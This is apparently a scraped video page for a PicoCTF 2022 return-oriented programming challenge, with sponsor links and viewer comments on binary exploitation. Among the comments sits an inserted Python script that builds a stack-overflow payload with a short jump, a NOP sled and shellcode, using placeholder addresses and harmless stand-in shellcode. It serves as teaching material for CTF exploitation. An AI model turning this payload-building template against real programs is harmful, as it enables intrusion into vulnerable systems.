Return Oriented Programming (PicoCTF 2022 #48 'ropfu')
20,379
Published 2022-05-17
❤️ Support ➡ j-h.io/patreon ↔ j-h.io/paypal ↔ j-h.io/buymeacoffee
Check out the affiliates below for more free or discounted learning!
🖥️ Zero-Point Security ➡ Certified Red Team Operator j-h.io/crto
💻Zero-Point Security ➡ C2 Development with C# j-h.io/c2dev
👨🏻💻7aSecurity ➡ Hacking Courses & Pentesting j-h.io/7asecurity
📗Humble Bundle ➡ j-h.io/humblebundle
🐶Snyk ➡ j-h.io/snyk
🌎Follow me! ➡ j-h.io/discord ↔ j-h.io/twitter ↔ j-h.io/linkedin ↔ j-h.io/instagram ↔ j-h.io/tiktok
📧Contact me! (I may be very slow to respond or completely unable to)
🤝Sponsorship Inquiries ➡ j-h.io/sponsorship
🚩 CTF Hosting Requests ➡ j-h.io/ctf
🎤 Speaking Requests ➡ j-h.io/speaking
💥 Malware Submission ➡ j-h.io/malware
❓ Everything Else ➡ j-h.io/etc
All Comments (21)
-
28:25 I was just like, why not sh()? But I was too hasty. Great work John 💖
-
Awesome as always my friend.
-
Hey John, have you tried using the command cyclic to find the padding size for your buffer? I would recommend that if you need to find the length quicker for easier calculations. Overall a great video, and keep up the good work!
-
Currently on my binary exploitation journey and this was engaging!! Thank you John
-
NICE!~ANOTHER VIDEO LETS GO JOHN!
-
Okay, this one was really freaking cool
-
In early today, was awesome seeing you at the Ninja one summit!
-
JOHN!!!!!!
I don't really understand what you did, but you talking us through this challenge is inspiring. This must be what my employers think when I'm explaining things to them haha.
Love you man!! Keep doing this because I'm going to be here to watch and listen...
Maybe stay away from binary bruv :)
-
There he is!
-
Hey Hey Mr. Hammond! Excuse any typos as I am barely awake right now. But I just wanted to ask if you knew any good reverse engineering/binary exploitation books/e-books out there. Or the best YouTubers that showcase, explain, and demonstrate how binary exploit/reverse exploit works. As I have focused far more on web exploits like XSS, SSRF, LFI etc...
Thanks again as always for all the educational content and hope you continue being an inspiration!! Thanks!!
-
This was really interesting!
-
Pardon my noob question, but I would like to know if this exploit will work if we replace the "A"s with a NOP sled. It would automatically enter the buffer then, would it not? We wouldn't need the short jump then.
-
Sir, I am getting problems in Forensics; the last one left in 300 pts and one 400 pts.
-
Thank you for the awesome and educational video, John. I have a question that you or maybe someone else could answer (and I'll post it elsewhere too).
Considering the stack was executable, could you not have done the following instead of using ROP?
1. Load the shellcode for "cat flag.txt" in your initial input instead of the 500 'C' bytes
2. For your injected return address after the buffer of 'A' bytes, simply put the address (in the stack) of the shellcode you just injected
Maybe I'm missing something, but assuming that ASLR isn't enabled since you were able to discern the address of the jump instruction, you could know the address in memory of the stack location you pushed your initial input to in the first place.
Maybe I'm not making any sense, but thank you again.
-
This video is just great! How do you write a Python script to solve this challenge?
-
How did you automatically know to jmp 10 bytes forward?
-
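The short-jump layout asked about in the two comments above (whether a NOP sled could replace the padding, and how the jump distance is chosen), as an added example that is not John's script or the challenge's own code. The padding length, the gadget address and the shellcode bytes are assumed placeholders, and the gadget is a hypothetical one that resumes execution at the buffer bytes sitting just before the overwritten return address. The point it shows is that an x86 `jmp rel8` displacement is measured from the end of the 2-byte instruction, so it is simply the number of bytes to hop over (here the 4-byte saved return address), and that a NOP sled placed in front of the return address cannot do the same job, because execution would run straight into the address bytes and decode them as instructions.

```python
import struct

# Added example, not from the video. All values below are assumptions:
# BUF_TO_RET: hypothetical distance from the start of the input buffer to the
#             saved return address (find the real one with cyclic / pattern_create).
# GADGET:     hypothetical address (no PIE) of a gadget that resumes execution at
#             the buffer bytes immediately before the saved return address.
BUF_TO_RET = 0x1c
GADGET = 0x08049000

# Constructed stand-in for real shellcode: `jmp $` (an infinite loop), harmless.
SHELLCODE = b"\xeb\xfe"


def jmp_short(from_off: int, to_off: int) -> bytes:
    """Encode x86 `jmp rel8` (EB xx) placed at from_off and landing at to_off.
    The displacement is relative to the END of the 2-byte instruction, so
    disp = to_off - (from_off + 2). Only -128..127 fits in rel8."""
    disp = to_off - (from_off + 2)
    if not -128 <= disp <= 127:
        raise ValueError(f"rel8 displacement {disp} out of range for a short jump")
    return b"\xeb" + struct.pack("<b", disp)


def build_payload(nop_count: int = 16, pad_byte: bytes = b"A") -> bytes:
    """Layout:  [padding][jmp short][saved EIP = GADGET][NOP sled][shellcode]
    The 2-byte jmp sits right before the return-address slot, so when GADGET
    hands control to that spot the 4 address bytes are skipped, not executed."""
    jmp_off = BUF_TO_RET - 2
    ret_off = BUF_TO_RET
    land_off = ret_off + 4              # first byte after the saved return address
    payload = pad_byte * jmp_off
    payload += jmp_short(jmp_off, land_off)
    payload += struct.pack("<I", GADGET)  # 32-bit little-endian return address
    payload += b"\x90" * nop_count        # sled absorbs a slightly-off landing
    payload += SHELLCODE
    return payload


def land_offset(payload: bytes, from_off: int) -> int:
    """Follow the single `jmp rel8` at from_off and return the offset it lands on."""
    if payload[from_off] != 0xEB:
        raise ValueError("no jmp short at that offset")
    disp = struct.unpack("<b", payload[from_off + 1:from_off + 2])[0]
    return from_off + 2 + disp


def first_non_nop(payload: bytes, start: int) -> int:
    """Offset of the first byte from `start` that is not a NOP (0x90): where a
    NOP sled stops sliding. With a sled in the padding it stops at the jmp;
    without the jmp it would reach the return-address bytes themselves."""
    for off in range(start, len(payload)):
        if payload[off] != 0x90:
            return off
    return len(payload)


if __name__ == "__main__":
    p = build_payload()
    print(p.hex())
    print("jmp at", hex(BUF_TO_RET - 2), "lands at", hex(land_offset(p, BUF_TO_RET - 2)))
```

Running it prints the payload and shows the jump landing on the first NOP after the return address; swapping `pad_byte=b"\x90"` shows that a sled in the padding region simply stops at the jump, which is why the sled alone does not carry execution across the saved return address. The NOP sled after the address is what gives slack when the gadget lands a few bytes off from where you expect.
-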
Cool, now i know that there is a Bird in my (HayStack). Nice. :)
-
I don't get why the stack canary isn't reporting *** stack smashing detected *** when you overflow the buffer, canary and the return address. Did I miss something?
-
interesting!
-
What are the 16 bytes of NOP for? At first, I didn't use any NOP instructions before the shellcode and it failed. After that I tried adding 2 bytes of NOP and it worked miraculously. Does it have anything to do with stack alignment?